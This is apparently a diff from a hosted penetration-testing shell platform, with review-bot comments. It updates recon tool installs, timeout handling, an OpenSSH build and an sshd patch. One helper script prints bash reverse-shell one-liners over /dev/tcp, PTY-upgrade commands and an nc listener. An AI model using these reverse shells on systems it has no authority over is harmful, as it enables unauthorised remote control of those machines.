||||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \
|
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \
|
||||||
&& mkdir -p /usr/share/gf \
|
&& mkdir -p /usr/share/gf \
|
||||||
&& svn export https://github.com/tomnomnom/gf/trunk /tmp/gf \
|
&& git clone --depth 1 https://github.com/tomnomnom/gf.git /tmp/gf \
|
||||||
&& mv /tmp/gf/examples/*.json /usr/share/gf \
|
&& mv /tmp/gf/examples/*.json /usr/share/gf \
|
||||||
&& mv /tmp/gf/gf-completion.* /usr/share/gf \
|
&& mv /tmp/gf/gf-completion.* /usr/share/gf \
|
||||||
&& rm -rf /tmp/gf \
|
&& rm -rf /tmp/gf \
|
||||||
&& svn export https://github.com/1ndianl33t/Gf-Patterns/trunk/ /tmp/gf \
|
&& git clone --depth 1 https://github.com/1ndianl33t/Gf-Patterns.git /tmp/gf \
|
||||||
&& mv /tmp/gf/*.json /usr/share/gf; }' \
|
&& mv /tmp/gf/*.json /usr/share/gf; }' \
|
||||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \
|
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \
|
||||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \
|
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \
|
||||||
@ -631,7 +631,8 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
|
|||||||
&& cmake . \
|
&& cmake . \
|
||||||
&& make \
|
&& make \
|
||||||
&& cp urldedupe /usr/bin; }' \
|
&& cp urldedupe /usr/bin; }' \
|
||||||
&& /pkg-install.sh HACK bash -c '{ svn export https://github.com/urbanadventurer/username-anarchy/trunk /opt/username-anarchy; }' \
|
&& /pkg-install.sh HACK bash -c '{ git clone --depth 1 https://github.com/urbanadventurer/username-anarchy.git /opt/username-anarchy \
|
||||||
|
&& rm -rf /opt/username-anarchy/.git*; }' \
|
||||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \
|
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \
|
||||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \
|
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \
|
||||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \
|
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \
|
||||||
@ -802,8 +803,8 @@ RUN /pkg-install.sh HACK ghbin ekzhang/bore '%arch:aarch64=arm%-unknown-linux'
|
|||||||
&& /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \
|
&& /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \
|
||||||
&& /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \
|
&& /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \
|
||||||
&& /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r
|
&& /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r
|
||||||
RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker \
|
RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker
|
||||||
&& /pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb'
|
## YANKED. Already in apt-get install powershell/pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb'
|
||||||
RUN /pkg-install.sh HACK bash -c '{ wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \
|
RUN /pkg-install.sh HACK bash -c '{ wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \
|
||||||
&& chmod 755 /usr/bin/favfreak.py \
|
&& chmod 755 /usr/bin/favfreak.py \
|
||||||
&& ln -s favfreak.py /usr/bin/FavFreak; }' \
|
&& ln -s favfreak.py /usr/bin/FavFreak; }' \
|
||||||
|
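Review bot: In the hunk at @ -614 the second checkout, `git clone --depth 1 https://github.com/1ndianl33t/Gf-Patterns.git /tmp/gf`, is never removed: the first clone is followed by `rm -rf /tmp/gf`, but after `mv /tmp/gf/*.json /usr/share/gf; }'` the second tree, now including a `.git` directory that the old `svn export` never produced, stays in the image layer. Change that line to `&& mv /tmp/gf/*.json /usr/share/gf && rm -rf /tmp/gf; }' \`. The username-anarchy clone in the next hunk does strip `.git*`, so the two are inconsistent. Both clones still fetch the default-branch head, as the svn trunk exports did, so rebuilds are not reproducible; pinning a tag with `--branch` or recording the intended commit in a comment would at least document what the image is expected to contain.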
@ -293,8 +293,10 @@ alias nocol=noansi
|
|||||||
# Make the Project name visibile in the PS1 prompt
|
# Make the Project name visibile in the PS1 prompt
|
||||||
[[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}"
|
[[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}"
|
||||||
|
|
||||||
PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:$PATH"
|
|
||||||
|
PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:/usr/local/go/bin:$PATH"
|
||||||
[[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples"
|
[[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples"
|
||||||
|
export PATH
|
||||||
|
|
||||||
_sf_info_non_perm()
|
_sf_info_non_perm()
|
||||||
{
|
{
|
||||||
|
@ -16,31 +16,31 @@ ERREXIT() {
|
|||||||
exit "${code:-99}"
|
exit "${code:-99}"
|
||||||
}
|
}
|
||||||
|
|
||||||
|
[[ ! -f /config/self/reverse_port ]] && curl sf/port
|
||||||
load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
|
load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
|
||||||
load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
|
load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
|
||||||
echo -e "\
|
echo -e "\
|
||||||
Use any of these commands on the remote system:${CDR}
|
Use one of these commands on the remote system:
|
||||||
bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'
|
1. ${CDR}bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'${CN}
|
||||||
(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &
|
2. ${CDR}(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &${CN}
|
||||||
${CN}
|
${CN}Once connected, cut & paste the following into the _this_ shell:
|
||||||
Once connected, cut & paste this into the remote shell:${CDC}
|
${CF}-------------------------------------------------------------------------------${CDC}
|
||||||
command -v python >/dev/null \\
|
command -v python >/dev/null \\
|
||||||
&& exec python -c 'import pty; pty.spawn(\"bash\")' \\
|
&& exec python -c 'import pty; pty.spawn(\"bash\")' \\
|
||||||
|| exec script -qc bash /dev/null
|
|| exec script -qc bash /dev/null
|
||||||
|
export SHELL=/bin/bash TERM=xterm-256color
|
||||||
export SHELL=/bin/bash
|
|
||||||
export TERM=xterm-256color
|
|
||||||
reset -I
|
reset -I
|
||||||
PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'
|
PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'
|
||||||
"'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'"
|
"'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'"
|
||||||
${CN}To force-exit this shell, type ${CDY}kill \"\$(pgrep -P $$)\"${CN}
|
${CN}${CF}-------------------------------------------------------------------------------${CN}
|
||||||
-----------------------------------"
|
To force-exit this listener, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} on your Root Server"
|
||||||
# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
|
# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
|
||||||
|
|
||||||
cfg=$(stty --save)
|
cfg=$(stty --save)
|
||||||
stty raw -echo opost
|
stty raw -echo opost
|
||||||
time nc -vnlp "$rport"
|
echo -e "${CDG}Listening on ${CG}${rip}:${rport}${CN}"
|
||||||
echo "Restoring TTY"
|
nc -nlp "$rport"
|
||||||
|
echo "🦋 Restoring terminal..."
|
||||||
stty "$cfg"
|
stty "$cfg"
|
||||||
# reset -I
|
# reset -I
|
||||||
|
|
||||||
|
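Review bot: The new banner line `${CN}Once connected, cut & paste the following into the _this_ shell:` reads "into the _this_ shell"; it should be `into _this_ shell:`. The unchanged line two above the banner, `load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. …"`, names the wrong file for the `reverse_ip` case and would read better as `No reverse ip found.` The added `[[ ! -f /config/self/reverse_port ]] && curl sf/port` does not check curl's result, which is acceptable only because the `load rport` on the next line still exits loudly; a short comment, `# best effort: the load below fails with a hint if this did not create the file`, would make that intent explicit.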
@ -1,29 +1,34 @@
|
|||||||
|
|
||||||
|
VER=9.6p1
|
||||||
|
|
||||||
all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile
|
all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile
|
||||||
docker build --no-cache --network host -t sf-host .
|
docker build --no-cache --network host -t sf-host .
|
||||||
|
|
||||||
albuild:
|
albuild:
|
||||||
bash -c "docker run --rm alpine-gcc true || \
|
bash -c "docker run --rm sf-alpine-gcc true || \
|
||||||
docker commit alpine-gcc alpine-gcc || { \
|
docker commit sf-alpine-gcc sf-alpine-gcc || { \
|
||||||
docker run --network host --name alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
|
docker run --network host --name sf-alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
|
||||||
&& docker commit alpine-gcc alpine-gcc; }"
|
&& docker commit sf-alpine-gcc sf-alpine-gcc; }"
|
||||||
|
|
||||||
# See mk_sshd.sh for manual debugging
|
# See mk_sshd.sh for manual debugging
|
||||||
fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh
|
fs-root/usr/sbin/sshd: albuild sf-sshd.patch mk_sshd.sh
|
||||||
docker run --rm -v$$(pwd):/src --net=host -w /tmp alpine-gcc /src/mk_sshd.sh
|
docker run --rm -v$$(pwd):/src --net=host -w /tmp --env VER=$(VER) sf-alpine-gcc /src/mk_sshd.sh
|
||||||
|
@echo "Type 'make diff' to create a sf-sshd-$(VER).patch"
|
||||||
|
|
||||||
fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c
|
fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c
|
||||||
docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
|
docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
|
||||||
@echo SUCCESS
|
@echo SUCCESS
|
||||||
|
|
||||||
fs-root/bin/unix-socket-client: unix-socket-client.c
|
fs-root/bin/unix-socket-client: unix-socket-client.c
|
||||||
docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
|
docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
|
||||||
@echo SUCCESS
|
@echo SUCCESS
|
||||||
|
|
||||||
diff:
|
diff:
|
||||||
cd dev && \
|
cd dev && \
|
||||||
diff -x '!*.[ch]' -u openssh-9.2p1-orig/ openssh-9.2p1-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd.patch
|
diff -x '!*.[ch]' -u openssh-$(VER)-orig/ openssh-$(VER)-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd-$(VER).patch
|
||||||
|
@echo "May want to 'mv sf-sshd-$(VER).patch sf-sshd.patch'."
|
||||||
|
|
||||||
clean:
|
clean:
|
||||||
rm -rf openssh-9.2p1-sf fs-root/usr/sbin/sshd
|
rm -rf openssh-$(VER)-orig openssh-$(VER)-sf fs-root/usr/sbin/sshd
|
||||||
docker image rm alpine-gcc
|
docker image rm sf-alpine-gcc
|
||||||
|
|
||||||
|
@ -424,7 +424,7 @@ print_goodbye()
|
|||||||
|
|
||||||
# Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick
|
# Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick
|
||||||
# Note: pgrep is executed in user's context. Treat the output with care and do not trust it.
|
# Note: pgrep is executed in user's context. Treat the output with care and do not trust it.
|
||||||
n=$(bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
|
n=$(timeout 2 bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
|
||||||
[[ -z "$n" ]] && n=0
|
[[ -z "$n" ]] && n=0
|
||||||
[[ ${#n} -gt 5 ]] && n=0
|
[[ ${#n} -gt 5 ]] && n=0
|
||||||
[[ ! $n -eq $n ]] && n=0
|
[[ ! $n -eq $n ]] && n=0
|
||||||
@ -435,7 +435,7 @@ print_goodbye()
|
|||||||
str="process is"
|
str="process is"
|
||||||
[[ "$n" -gt 1 ]] && str="processes are"
|
[[ "$n" -gt 1 ]] && str="processes are"
|
||||||
echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}"
|
echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}"
|
||||||
exec_errnull docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
|
exec_errnull timeout 2 docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
|
||||||
echo -e "\
|
echo -e "\
|
||||||
-------> The encrypted filesystem in /sec will remain accessible until
|
-------> The encrypted filesystem in /sec will remain accessible until
|
||||||
-------> the last shell exits or all background processes terminate.
|
-------> the last shell exits or all background processes terminate.
|
||||||
@ -443,16 +443,6 @@ print_goodbye()
|
|||||||
-------> This will also make /sec unavailabe until your next log in."
|
-------> This will also make /sec unavailabe until your next log in."
|
||||||
fi
|
fi
|
||||||
echo -en "\r"
|
echo -en "\r"
|
||||||
[[ -z $SF_IS_PAYING ]] && {
|
|
||||||
echo -e "\
|
|
||||||
${CDY}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
|
||||||
@@@ ${CDG}** GET MORE MEMORY, SPEED, STORAGE AND NO RESTRICTIONS **${CDY} @@@
|
|
||||||
@@@ ${CDR}${CUL}https://www.thc.org/segfault/free${CN}${CDY} @@@
|
|
||||||
@@@ ${CB}${CUL}https://www.thc.org/segfault/upgrade${CN}${CDY} @@@
|
|
||||||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@${CN}"
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
sysmsg "/config/host/etc/logoutmsg-all.sh"
|
sysmsg "/config/host/etc/logoutmsg-all.sh"
|
||||||
|
|
||||||
echo -e "\
|
echo -e "\
|
||||||
@ -536,7 +526,7 @@ spawn_shell_exit()
|
|||||||
tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip"
|
tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip"
|
||||||
[[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip"
|
[[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip"
|
||||||
# Request a reverse Port Forward
|
# Request a reverse Port Forward
|
||||||
[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull docker exec --user 0:0 "lg-${LID}" curl -s sf/port
|
[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull timeout 2 docker exec --user 0:0 "lg-${LID}" curl -s sf/port
|
||||||
|
|
||||||
|
|
||||||
# Warn user if this is the last server by IP (after semaphore has been released)
|
# Warn user if this is the last server by IP (after semaphore has been released)
|
||||||
@ -1400,7 +1390,7 @@ exec_devnull docker exec sf-master /ready-lg.sh "${LID}" "${C_IP}" "${LG_PID}" "
|
|||||||
# Setup container (within container's namespace)
|
# Setup container (within container's namespace)
|
||||||
unset WGNAME_UP
|
unset WGNAME_UP
|
||||||
[[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")"
|
[[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")"
|
||||||
exec_devnull docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
|
exec_devnull timeout 5 docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
|
||||||
touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY"
|
touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY"
|
||||||
tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip"
|
tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip"
|
||||||
|
|
||||||
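Review bot: The `timeout` wrappers added around the four `docker exec` invocations only terminate the docker client; the process started inside `lg-${LID}` is not necessarily stopped, so after the 5-second timeout on `/sf/bin/sf-setup.sh` the STOPEXIT path may run while the setup script is still executing in the guest. The STOPEXIT message also cannot be told apart from a real failure; `... || STOPEXIT "${LID}" 247 "Failed-#2 (rc=$?) to set up guest container..."` would make timeout's exit status 124 visible in the logs. For the two pgrep calls a timeout silently yields n=0 and the "still running" warning is dropped; if that is the intent, a comment such as `# timeout -> n=0: skip the warning rather than delay logout` on the first one would document it. print_goodbye, spawn_shell_exit and the setup block all start and end outside these hunks.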
|
@ -11,11 +11,17 @@
|
|||||||
DSTDIR="/src/fs-root/usr/sbin"
|
DSTDIR="/src/fs-root/usr/sbin"
|
||||||
DSTBIN="${DSTDIR}/sshd"
|
DSTBIN="${DSTDIR}/sshd"
|
||||||
set -e
|
set -e
|
||||||
SRCDIR="/tmp/openssh-9.2p1"
|
SRCDIR="/src/dev/openssh-${VER:?}-sf"
|
||||||
|
[[ ! -d "/src/dev" ]] && mkdir -p "/src/dev"
|
||||||
|
cd /src/dev
|
||||||
[[ ! -d "$SRCDIR" ]] && {
|
[[ ! -d "$SRCDIR" ]] && {
|
||||||
# Cloudflare to often returns 503 - "BLOCKED"
|
# Cloudflare to often returns 503 - "BLOCKED"
|
||||||
# wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
|
# wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
|
||||||
wget -O- https://artfiles.org/openbsd/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
|
wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz"
|
||||||
|
tar xfz "openssh-${VER}.tar.gz"
|
||||||
|
mv "openssh-${VER}" "openssh-${VER}-orig"
|
||||||
|
tar xfz "openssh-${VER}.tar.gz"
|
||||||
|
mv "openssh-${VER}" "${SRCDIR}"
|
||||||
|
|
||||||
cd "$SRCDIR"
|
cd "$SRCDIR"
|
||||||
|
|
||||||
@ -39,5 +45,5 @@ strip sshd
|
|||||||
[[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}"
|
[[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}"
|
||||||
cp sshd "${DSTBIN}"
|
cp sshd "${DSTBIN}"
|
||||||
chmod 755 "${DSTBIN}"
|
chmod 755 "${DSTBIN}"
|
||||||
rm -rf "${SRCDIR:?}"
|
# rm -rf "${SRCDIR:?}"
|
||||||
|
|
||||||
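Review bot: The OpenSSH tarball fetched by the new `wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz"` is extracted, patched and copied into fs-root without any integrity check, so the shipped sshd is only as trustworthy as that third-party mirror and the TLS hop. Pin the expected digest per VER and verify before the first `tar xfz`, e.g. `echo "<SHA256_OF_openssh-${VER}.tar.gz>  openssh-${VER}.tar.gz" | sha256sum -c -` (or verify the upstream .asc signature), so that the `set -e` above aborts on a mismatch. The commented-out `# rm -rf "${SRCDIR:?}"` at the end is dead code; if the tree is now kept on purpose for `make diff`, say so instead, e.g. `# SRCDIR is kept so that 'make diff' can regenerate sf-sshd-$VER.patch from it`. The script continues between and after these hunks.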
|
@ -1,7 +1,7 @@
|
|||||||
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-sf/channels.c
|
diff -x !*.[ch] -u openssh-9.6p1-orig/channels.c openssh-9.6p1-sf/channels.c
|
||||||
--- openssh-9.2p1-orig/channels.c 2023-02-02 12:21:54
|
--- openssh-9.6p1-orig/channels.c 2023-12-18 14:59:50
|
||||||
+++ openssh-9.2p1-sf/channels.c 2023-08-15 06:13:05
|
+++ openssh-9.6p1-sf/channels.c 2024-01-20 17:50:15
|
||||||
@@ -3639,7 +3639,7 @@
|
@@ -3683,7 +3683,7 @@
|
||||||
ssh->chanctxt->IPv4or6 = af;
|
ssh->chanctxt->IPv4or6 = af;
|
||||||
}
|
}
|
||||||
|
|
||||||
@ -10,7 +10,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
|
|||||||
/*
|
/*
|
||||||
* Determine whether or not a port forward listens to loopback, the
|
* Determine whether or not a port forward listens to loopback, the
|
||||||
* specified address or wildcard. On the client, a specified bind
|
* specified address or wildcard. On the client, a specified bind
|
||||||
@@ -3677,6 +3677,7 @@
|
@@ -3721,6 +3721,7 @@
|
||||||
* address and it was overridden.
|
* address and it was overridden.
|
||||||
*/
|
*/
|
||||||
if (*listen_addr != '\0' &&
|
if (*listen_addr != '\0' &&
|
||||||
@ -18,10 +18,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
|
|||||||
strcmp(listen_addr, "0.0.0.0") != 0 &&
|
strcmp(listen_addr, "0.0.0.0") != 0 &&
|
||||||
strcmp(listen_addr, "*") != 0) {
|
strcmp(listen_addr, "*") != 0) {
|
||||||
ssh_packet_send_debug(ssh,
|
ssh_packet_send_debug(ssh,
|
||||||
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1-sf/serverloop.c
|
diff -x !*.[ch] -u openssh-9.6p1-orig/serverloop.c openssh-9.6p1-sf/serverloop.c
|
||||||
--- openssh-9.2p1-orig/serverloop.c 2023-02-02 12:21:54
|
--- openssh-9.6p1-orig/serverloop.c 2023-12-18 14:59:50
|
||||||
+++ openssh-9.2p1-sf/serverloop.c 2023-08-15 06:18:17
|
+++ openssh-9.6p1-sf/serverloop.c 2024-01-20 17:50:15
|
||||||
@@ -102,6 +102,12 @@
|
@@ -101,6 +101,12 @@
|
||||||
/* requested tunnel forwarding interface(s), shared with session.c */
|
/* requested tunnel forwarding interface(s), shared with session.c */
|
||||||
char *tun_fwd_ifnames = NULL;
|
char *tun_fwd_ifnames = NULL;
|
||||||
|
|
||||||
@ -34,7 +34,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||||||
/* returns 1 if bind to specified port by specified user is permitted */
|
/* returns 1 if bind to specified port by specified user is permitted */
|
||||||
static int
|
static int
|
||||||
bind_permitted(int port, uid_t uid)
|
bind_permitted(int port, uid_t uid)
|
||||||
@@ -391,8 +397,10 @@
|
@@ -388,8 +394,10 @@
|
||||||
/* Clean up sessions, utmp, etc. */
|
/* Clean up sessions, utmp, etc. */
|
||||||
cleanup_exit(255);
|
cleanup_exit(255);
|
||||||
}
|
}
|
||||||
@ -46,7 +46,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||||||
if (conn_in_ready &&
|
if (conn_in_ready &&
|
||||||
process_input(ssh, connection_in) < 0)
|
process_input(ssh, connection_in) < 0)
|
||||||
break;
|
break;
|
||||||
@@ -637,12 +645,14 @@
|
@@ -634,12 +642,14 @@
|
||||||
|
|
||||||
if (strcmp(ctype, "session") == 0) {
|
if (strcmp(ctype, "session") == 0) {
|
||||||
c = server_request_session(ssh);
|
c = server_request_session(ssh);
|
||||||
@ -67,7 +67,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||||||
}
|
}
|
||||||
if (c != NULL) {
|
if (c != NULL) {
|
||||||
debug_f("confirm %s", ctype);
|
debug_f("confirm %s", ctype);
|
||||||
@@ -802,8 +812,20 @@
|
@@ -799,8 +809,20 @@
|
||||||
ssh_packet_send_debug(ssh, "Server has disabled port forwarding.");
|
ssh_packet_send_debug(ssh, "Server has disabled port forwarding.");
|
||||||
} else {
|
} else {
|
||||||
/* Start listening on the port */
|
/* Start listening on the port */
|
||||||
@ -90,10 +90,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||||||
}
|
}
|
||||||
if ((resp = sshbuf_new()) == NULL)
|
if ((resp = sshbuf_new()) == NULL)
|
||||||
fatal_f("sshbuf_new");
|
fatal_f("sshbuf_new");
|
||||||
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/sshd.c
|
diff -x !*.[ch] -u openssh-9.6p1-orig/sshd.c openssh-9.6p1-sf/sshd.c
|
||||||
--- openssh-9.2p1-orig/sshd.c 2023-02-02 12:21:54
|
--- openssh-9.6p1-orig/sshd.c 2023-12-18 14:59:50
|
||||||
+++ openssh-9.2p1-sf/sshd.c 2023-08-15 06:13:05
|
+++ openssh-9.6p1-sf/sshd.c 2024-01-20 17:50:15
|
||||||
@@ -536,8 +536,71 @@
|
@@ -531,8 +531,71 @@
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@ -165,7 +165,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/ss
|
|||||||
privsep_postauth(struct ssh *ssh, Authctxt *authctxt)
|
privsep_postauth(struct ssh *ssh, Authctxt *authctxt)
|
||||||
{
|
{
|
||||||
#ifdef DISABLE_FD_PASSING
|
#ifdef DISABLE_FD_PASSING
|
||||||
@@ -576,8 +639,34 @@
